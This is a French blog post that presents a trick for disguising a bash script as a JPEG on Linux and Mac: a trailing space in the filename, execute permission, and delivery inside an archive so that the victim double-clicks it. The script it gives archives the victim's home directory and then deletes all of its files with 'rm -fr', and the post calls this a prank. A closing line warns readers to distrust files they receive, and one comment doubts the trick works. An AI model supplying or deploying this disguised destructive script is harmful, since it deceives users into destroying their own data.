[Shell2Jpg] Déguiser un script en image !!!

 

Salut les loustiques !!

 

Bon début de semaine, je risque de ne pas être trop présent la semaine qui arrive, car je prépare mon anniversaire pour mes 25 printemps !!!

 

Mais pour me faire pardonner, voici un petit article cadeau qui permettra de faire de gentilles (ou méchantes) blagues à des utilisateurs Linuxiens ou Mac ^^

 

Je ne sais pas si vous avez connu sous Windows les fameuses images .... qui n'en était pas vraiment ...

vraiment ?

 

Capture

 

Oui, car l'extension d'un fichier, détermine ce, avec quoi il sera ouvert ^^
Du coup en renommant un exécutable en :

"toto.jpg                           (tout plein d'espace)     .exe"

 

L'utilisateur s'il n'est pas vigilant, n'y voit que du feu... et se fait avoir !

 

Eh bien, sur Linux, c'est un peu plus violent que ça, et c'est ça qui est bon !!!

 

Comme vous pouvez le constater ici :

jpgbackdoor (1)

 

En gros, vous pouvez aisément, créer un fichier :

"maphoto.jpg "

( à noter que j'ai un espace après le .jpg ==> ".jpg(espace)" )

 

L'espace, sert à éviter d'être ouvert par une visionneuse d'images...
Linux ou Mac, ne connaissant pas ce type de fichier, iront chacun jeter un œil dans l'entête du fichier, pour savoir s'il est précisé ce avec quoi il faut l'ouvrir.

 

Aussi, nous allons lui indiquer ... en  remplissant notre fichier avec un script bash :

#!/bin/bash
#Et hop, on sauvegarde les fichiers, pour les faires disparaitre (méchantes blagues)
tar -czf /tmp/blagounette.tar.gz /home/$user
rm /home/$user/* -fr

 

Enfin, nous lui donnerons des droits d’exécution ... pour permettre à notre utilisateur de l'ouvrir d'un simple double clic ...

 

chmod +x "maphoto.jpg "

 

Et pour finir, dans l'art du déguisement, vous enverrez cette image dans une archive ...

Pourquoi ?

Eh bien, parce que le logiciel d'archives n'affichera pas (dans la majorité des cas) d'icone amenant l'utilisateur à douter du fichier.

 

Capture

 

Ainsi, en double cliquant sur le fichier, qu'il soit sur Mac ou sur Linux ...
Notre ami, exécutera notre script ..

 

Ayez toujours un doute, des fichiers que vous recevez, surtout si vous n'êtes pas certains de la provenance ...

 

 

 

 

One comment

  • « Enfin, nous lui donnerons des droits d’exécution … pour permettre à notre utilisateur de l’ouvrir d’un simple double clic … »

    Sous Mac je ne sais pas mais avec Nautilus et tous les gestionnaires de fichiers linux il n’y a que les gogos pour choisir d’exécuter les scripts au lieu de les afficher alors que c’est le réglage par défaut.

    Elle ne va pas attrapper beaucoup de libristes ta ruse de sioux…

Laisser une réponse

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site est protégé par reCAPTCHA et le GooglePolitique de confidentialité etConditions d'utilisation appliquer.